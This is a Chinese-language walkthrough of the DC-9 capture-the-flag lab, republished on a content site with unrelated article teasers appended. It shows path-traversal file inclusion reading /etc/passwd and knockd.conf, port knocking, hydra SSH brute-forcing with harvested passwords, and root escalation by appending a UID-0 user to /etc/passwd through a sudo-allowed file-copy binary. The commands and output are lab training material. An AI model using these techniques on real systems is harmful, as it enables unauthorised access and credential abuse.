wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

返回信息

所已此页面存在文件包含漏洞

3.2.3 敲门服务

利用前一步发现的文件包含漏洞,看看敲门服务的配置文件。
访问链接:http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/knockd.conf
返回信息:

[options] 
UseSyslog [openSSH] sequence = 7469,8475,9842 
seq_timeout = 25 
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT 
tcpflags = syn [closeSSH] 
sequence = 9842,8475,7469 
seq_timeout = 25 
command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT 
tcpflags = syn

返回敲门服务配置

[openSSH] sequence = 7469,8475,9842
上一行配置信息,说明了开启ssh服务,需要依次开启端口7469,8475,9842,
关闭端口則反过来依次关闭端口9842,8475,7469

3.3 SSH相关

3.3.1 nc开启SSH服务

──(root㉿kali)-[/home/kali]
└─#  for i in 7469 8475 9842 22 ;do nc 192.168.6.145 $i;done
(UNKNOWN) [192.168.6.145] 7469 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 8475 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 9842 (?) : Connection refused
(UNKNOWN) [192.168.6.145] 22 (ssh) : Connection refused

如bash信息显示所示。

3.3.2 端口扫描

再次进行端口扫描测试

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 10:28 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00022s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:C1:5E:37 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.55 seconds

此时发现,22端口已经开启,不再是“22/tcp filtered ssh”。O(∩_∩)O哈哈~

3.3.3 hydra

3.3.3.1 生成字典

利用SQL注入(3.1.3.1)时获得的用户信息,生成字典。
users.txt \ passwd.txt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat users.txt 
marym     
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2                      ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt 
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0                
3.3.3.2 执行hydra爆破ssh

利用生成的字典进行ssh爆破

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 10:50:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 10:51:39

获得一些用户名和密码:

用户名密码
chandlerbUrAG0D!
joeytPassw0rd
janitorIlovepeepee

3.4 ssh连接

3.4.1 chandlerb

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh chandlerb@192.168.6.145                                                     
chandlerb@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ whoami
chandlerb
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ cd /home
chandlerb@dc-9:/home$ ls
barneyr  chandlerb  janitor   jerrym  julied  monicag  rachelg	scoots	wilmaf
bettyr	 fredf	    janitor2  joeyt   marym   phoebeb  rossg	tomc
chandlerb@dc-9:/home$ cd chandlerb/
chandlerb@dc-9:~$ ls
chandlerb@dc-9:~$ 

chandlerb用户没有发现有用信息。

3.4.2 joeyt

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh joeyt@192.168.6.145    
joeyt@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
joeyt@dc-9:~$ ls
joeyt@dc-9:~$ cd /home
joeyt@dc-9:/home$ ls
barneyr  bettyr  chandlerb  fredf  janitor  janitor2  jerrym  joeyt  julied  marym  monicag  phoebeb  rachelg  rossg  scoots  tomc  wilmaf
joeyt@dc-9:/home$ 

joeyt用户没有发现更多有用信息。

3.4.3 janitor

┌──(root㉿kali)-[/home/kali]
└─# ssh janitor@192.168.6.145  
janitor@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
janitor@dc-9:~$ ls
janitor@dc-9:~$ ls -al
total 16
drwx------  4 janitor janitor 4096 Jun  2 00:51 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Jun  2 00:51 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$ 
janitor@dc-9:~/.secrets-for-putin$ sudo -lWe trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for janitor: 
Sorry, user janitor may not run sudo on dc-9.

如图所示,发现了一些密码,将新发现的密码添加到密码字典中。并且没有可执行sudo的命令。

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# vim passwd.txt ┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# cat passwd.txt            
3kfs86sfd
468sfdfsd2
4sfd87sfd1
RocksOff
TC&TheBoyz
B8m#48sd
Pebbles
BamBam01
UrAG0D!
Passw0rd
yN72#dsd
ILoveRachel
3248dsds7s
smellycats
YR3BVxxxw87
Ilovepeepee
Hawaii-Five-0
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

再次使用hydra爆破

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# hydra -L users.txt -P passwd.txt 192.168.6.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 11:48:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://192.168.6.145:22/
[22][ssh] host: 192.168.6.145   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.6.145   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.6.145   login: joeyt   password: Passw0rd
[STATUS] 329.00 tries/min, 329 tries in 00:01h, 63 to do in 00:01h, 15 active
[22][ssh] host: 192.168.6.145   login: janitor   password: Ilovepeepee
1 of 1 target successfully completed, 5 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-01 11:49:34

获得新用户名和密码:

用户名密码
fredfB4-Tru3-001

3.4.4 fredf

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# ssh fredf@192.168.6.145    
fredf@192.168.6.145's password: 
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ ls
fredf@dc-9:~$ ls -al
total 12
drwx------  3 fredf fredf 4096 Jun  2 01:48 .
drwxr-xr-x 19 root  root  4096 Dec 29  2019 ..
lrwxrwxrwx  1 fredf fredf    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 fredf fredf 4096 Jun  2 01:48 .gnupg
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$

我们在fredf用户系统里发现了可执行sudo命令的程序:
关键信息:(root) NOPASSWD: /opt/devstuff/dist/test/test
提示不需要密码就可以执行root命令。

查看test.py:

fredf@dc-9:~$ cd /opt/devstuff
fredf@dc-9:/opt/devstuff$ ls -al
total 28
drwxr-xr-x 5 root root 4096 Dec 29  2019 .
drwxr-xr-x 4 root root 4096 Dec 29  2019 ..
drwxr-xr-x 3 root root 4096 Dec 29  2019 build
drwxr-xr-x 3 root root 4096 Dec 29  2019 dist
drwxr-xr-x 2 root root 4096 Dec 29  2019 __pycache__
-rw-r--r-- 1 root root  250 Dec 29  2019 test.py
-rw-r--r-- 1 root root  959 Dec 29  2019 test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$ 

这是一个写入文件的脚本,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限,实现提权。

3.5 linux系统提权

3.5.1 kali生成hash密码

┌──(root㉿kali)-[/home/kali/dev_run_app/vulhub/dc-9]
└─# openssl passwd -1 -salt admin 123456
$1$admin$LClYcRe.ee8dQwgrFc5nz.

生成了加密的密码:

$1$admin$LClYcRe.ee8dQwgrFc5nz.

3.5.2 将密码写入/etc/passwd

依次执行以下命令:

 echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwdcd /opt/devstuff/dist/test/ls -alsudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd
fredf@dc-9:/opt/devstuff$ cd /opt/devstuff/dist/test/
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root    4096 Dec 29  2019 .
drwxr-xr-x 3 root root    4096 Dec 29  2019 ..
-rw-r--r-- 1 root root  779676 Dec 29  2019 base_library.zip
-rwxr-xr-x 1 root root   26136 Apr  3  2019 _bz2.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  153904 Apr  3  2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  158032 Apr  3  2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   31024 Apr  3  2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  272688 Apr  3  2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  141616 Apr  3  2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  112944 Apr  3  2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   34008 Apr  3  2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   74688 Jul 11  2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13  2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root  243840 Sep 20  2019 libexpat.so.1
-rwxr-xr-x 1 root root  158400 Jan 28  2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr  3  2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root  309096 May  6  2018 libreadline.so.7
-rwxr-xr-x 1 root root  593696 Oct 13  2019 libssl.so.1.1
-rwxr-xr-x 1 root root  183528 Aug  6  2019 libtinfo.so.6
-rwxr-xr-x 1 root root  121280 Sep 26  2017 libz.so.1
-rwxr-xr-x 1 root root   37688 Apr  3  2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   64792 Apr  3  2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   14632 Apr  3  2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   39944 Apr  3  2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   19752 Apr  3  2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root  116568 Apr  3  2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root   29064 Apr  3  2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29  2019 test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/passwd /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ 

成功将passwd写入到/etc/passwd目录

3.5.3 获得flag

3.5.3.1 切换admin用户

用户名:admin
密 码:123456

fredf@dc-9:/opt/devstuff/dist/test$ su admin
Password: 
root@dc-9:/opt/devstuff/dist/test# 

命令行显示,已获得root权限。

3.5.3.2 查找flag文件
root@dc-9:/opt/devstuff/dist/test# find / -name *flag*
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/sda/hctx0/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/var/lib/mysql/debian-10.3.flag
/proc/sys/kernel/acpi_video_flags
/proc/kpageflags
/root/theflag.txt
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/ss_flags.ph
/usr/lib/x86_64-linux-gnu/perl/5.28.1/bits/waitflags.ph
/usr/bin/dpkg-buildflags
/usr/include/x86_64-linux-gnu/asm/processor-flags.h
/usr/include/x86_64-linux-gnu/bits/waitflags.h
/usr/include/x86_64-linux-gnu/bits/ss_flags.h
/usr/include/linux/kernel-page-flags.h
/usr/include/linux/tty_flags.h
/usr/share/man/man3/fegetexceptflag.3.gz
/usr/share/man/man3/fesetexceptflag.3.gz
/usr/share/man/nl/man1/dpkg-buildflags.1.gz
/usr/share/man/de/man1/dpkg-buildflags.1.gz
/usr/share/man/man1/dpkg-buildflags.1.gz
/usr/share/man/fr/man1/dpkg-buildflags.1.gz
/usr/share/man/man2/ioctl_iflags.2.gz
/usr/share/dpkg/buildflags.mk

获得falg文件的位置:
/root/theflag.txt

3.5.3.3 查看flag文件
root@dc-9:/opt/devstuff/dist/test# cat /root/theflag.txt███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝Congratulations - you have done well to get to this point.Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.I also want to send out a big thank you to the various members of @m0tl3ycr3w .They are an inspirational bunch of fellows.Sure, they might smell a bit, but...just kidding.  :-)Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.So long, and thanks for all the fish.root@dc-9:/opt/devstuff/dist/test# 

至此,dc-9渗透测试结束,获得最终flag。O(∩_∩)O哈哈~ 全文40627字,呜呼


渗透总结

在DC-9靶场渗透测试中,内容包括nmap扫描、目录扫描(nikto\dirsearch\dirb)、SQ注入、wfuzz爆破、LFI文件包含、SSH爆破(knockd\nmap\netcat\Hydra)、linux内核提权(openssl)并获得flag等内容。思路如下:

  • 使用nmap进行主机发现和端口扫描
  • 目录扫描(nikto\dirsearch\dirb)
  • LFI文件包含漏洞
  • 使用sqlmp进行sql注入获得用户信息
  • 使用hydra进行密码爆破
  • SSH爆破(knockd\nmap\netcat\Hydra)
  • linux内核提权,并获得flag

参考文章

  • DC-9环境
  • arp-scan使用
  • nmap详细使用教程
  • 黑客工具之whatweb详细使用教程
  • sqlmap使用
  • hydra工具的使用 (暴力破解密码)及kali自带字典说明
  • 通过Knockd隐藏SSH,让黑客看不见你的服务器
  • dc-9渗透测试流程图

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/22518.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

OTTO、亚马逊、Temu卖家如何运用测评补单来提高购买率?

在跨境电商的广阔舞台上,测评补单无疑是一股不可或缺的强劲动力。商家们深知,通过补单这一手段,能够快速为产品注入活力,使销量迅猛攀升,评论如潮涌至,进而在激烈的竞争中脱颖而出,勇攀销量之巅…

绘画新手必备!六款免费易用的绘图软件推荐

在当今的数字世界里有各种各样的设计创作工具,那么问题来了我们应该如何在众多免费绘图软件中选择呢?为了回答这个问题,我们将在本文中介绍和测评六个领先的绘图软件。每一个都有自己独特的特点和优势,适合不同的需求和用户。以下…

香港优才计划是什么?一文说明白2024香港优才政策、申请条件、流程及利弊

香港优才计划是拿香港身份比较热门的方式之一,对很多想要保留生活重心在内地,但是又需要香港身份为子女规划教育升学的人来说,申请香港优才计划是获取香港身份再好不过的方式。 我们刚开始了解香港优才计划可能会有各种各样的担心&#xff0…

Terraform安装+部署Azure Resource笔记

安装 下载 Terraform: 首先,访问 官方 Terraform 网站。找到适用于 Windows 的 Terraform 包,并下载 zip 文件。解压 Terraform 包: 将下载的 zip 文件解压到一个新文件夹中,命名为 “Terraform”。可以选择任何位置作…

IDC最新报告:预计到2027年全球数字化转型支出将近4万亿美元

根据国际数据公司(IDC)5月30日发布的《全球数字化转型支出指南》,预计到2027年全球数字化转型(DX)支出将接近4万亿美元。在人工智能(AI)和生成式人工智能(Generative AI)…

手机自动化测试笔记:1.appium的安装与使用

建议先安装前置的程序,同时建议使用anconda进行环境管理。 参考1: 深度学习笔记:1.anaconda安装-CSDN博客https://blog.csdn.net/weixin_42771529/article/details/139434840 参考2: 笔记:如何在pycharm中使用anaco…

EyeGlassesGAN——通过消除人脸所带的眼镜以提高人脸识别的精度

0. 引言 从人脸图像中自动去除眼镜的框架是一个具有挑战性的问题,因为它涉及到精确地识别和处理图像中的眼镜以及相关的眩光和有色镜片。以下是该论文可能提出的一些关键点: (1). 学习框架: 数据集构建:…

深入浅出mysql海量数据批量更新插入、批量查询

1. mysql的批量写 mysql 批量插入可以用下面这种,在values 之后跟上各种多个值列表。但这种写法可能导致sql长度超长、锁超时等问题。 insert into (field1,field1,field1,) values (value01,value02,value03),(value11,value12,value13),(value21,value22,value2…

使用springboot+vue实现阿里云oss上传

一、前言 我们后端开发中,时常需要用到文件上传的功能,无非是保存到服务器本地或者如阿里云、七牛云这种云存储的方案。本篇介绍一种使用后台springboot结合前端vue实现阿里云oss上传的功能。 二、实现过程 前端实现一个通用的上传组件UploadFile &l…

可以通过其瞳孔判断AI生成的人脸数据是否可靠

概述 我们都知道,GANs的发展使得生成相互之间无法区分的人脸图像成为可能。虽然这项技术在发展,但也有弊端,比如出现了用生成的人脸作为资料图片的虚假社交媒体账户。因此,随着GANs的发展,使用深度学习模型检测生成的…

Java Web学习笔记5——基础标签和样式

<!DOCTYPE html> html有很多版本&#xff0c;那我们应该告诉用户和浏览器我们现在使用的是HMTL哪个版本。 声明为HTML5文档。 字符集&#xff1a; UTF-8&#xff1a;现在最常用的字符编码方式。 GB2312&#xff1a;简体中文 BIG5&#xff1a;繁体中文、港澳台等方式…

ARM32开发——串口输出

&#x1f3ac; 秋野酱&#xff1a;《个人主页》 &#x1f525; 个人专栏:《Java专栏》《Python专栏》 ⛺️心若有所向往,何惧道阻且长 文章目录 需求串口数据发送串口打印实现复用功能串口发送流程&#xff08;了解&#xff09;串口的标志位关心的内容 需求 串口循环输出内容到…

大数据基础问题:在Hive中如何实现全增量统一的UDTF、内置函数、聚合、Join等计算引擎常见算子?

仁者见仁智者见智&#xff0c;每个程序员的方法都不一样&#xff0c;老的程序员和新的程序员之间的思维差距很大&#xff0c;新入公司的和老员工的代码差距也很大。 在Apache Hive中&#xff0c;实现全增量统一的用户定义表生成函数&#xff08;UDTF&#xff09;、内置函数、聚…

pdf文件怎么合并成一个文件

在现代办公环境中&#xff0c;PDF文件的使用已变得非常普遍。它们具有跨平台、易读性强的特点&#xff0c;因此被广泛应用于各种场合。然而&#xff0c;当需要处理大量的PDF文件时&#xff0c;如何有效地将它们合并成一个文件&#xff0c;成为了一个需要解决的问题。本文将详细…

【越界写null字节】ACTF2023 easy-netlink

前言 最近在矩阵杯遇到了一道 generic netlink 相关的内核题&#xff0c;然后就简单学习了一下 generic netlink 相关概念&#xff0c;然后又找了一到与 generic netlink 相关的题目。简单来说 generic netlink 相关的题目仅仅是将用户态与内核态的交互方式从传统的 ioctl 变成…

盘点学习Python常犯一些错误,你中了几个

对于刚入门的 Pythonista 在学习过程中运行代码是或多或少会遇到一些错误&#xff0c;刚开始可能看起来比较费劲。随着代码量的积累&#xff0c;熟能生巧当遇到一些运行时错误时能够很快的定位问题原题。下面整理了一些常见的 17 个错误&#xff0c;等你写出的代码不怎么出现这…

测试工具链

缺陷管理 bug管理工具 devops---项目管理--缺陷管理 bug管理地址 https://devsecops.mychery.com:8443/chery/project?filterROLE&statusACTIVE bug管理环境 采用公司的devops平台&#xff0c;对每个项目的bug进行管理。目前在使用 接口测试和服务端性能测试 工具…

斯坦福抄袭清华、面壁智能大模型,当事人已道歉、删项目

6月4日&#xff0c;两名斯坦福大学生Aksh Garg和Siddharth Sharma&#xff0c;承认抄袭清华和面壁智能联合开发的MiniCPM-Llama3-V2.5&#xff08;以下简称V2.5&#xff09;多模态大模型事件&#xff0c;并在社交平台公开道歉、删掉开源项目。 该抄袭事件也得到了斯坦福大学AI…

【python】成功解决“ImportError: cannot import name ‘triu’ from ‘scipy.linalg’”错误的全面指南

成功解决“ImportError: cannot import name ‘triu’ from ‘scipy.linalg’”错误的全面指南 在Python编程中&#xff0c;尤其是在使用scipy这个科学计算库时&#xff0c;可能会遇到ImportError错误&#xff0c;提示无法从scipy.linalg模块中导入名为triu的函数。这个错误通…

ROS系列rqt的安装以及使用方法介绍

目录 1. 安装 2. 部分工具的功能介绍及使用方法 1&#xff09;rqt_gui 2&#xff09;rqt_topic 3&#xff09;rqt_graph 4&#xff09;qt_plot 5&#xff09;rqt_service_caller 6&#xff09;rqt_bag 1. 安装 安装极其简单&#xff0c;不多介绍&#xff0c;直接上命令…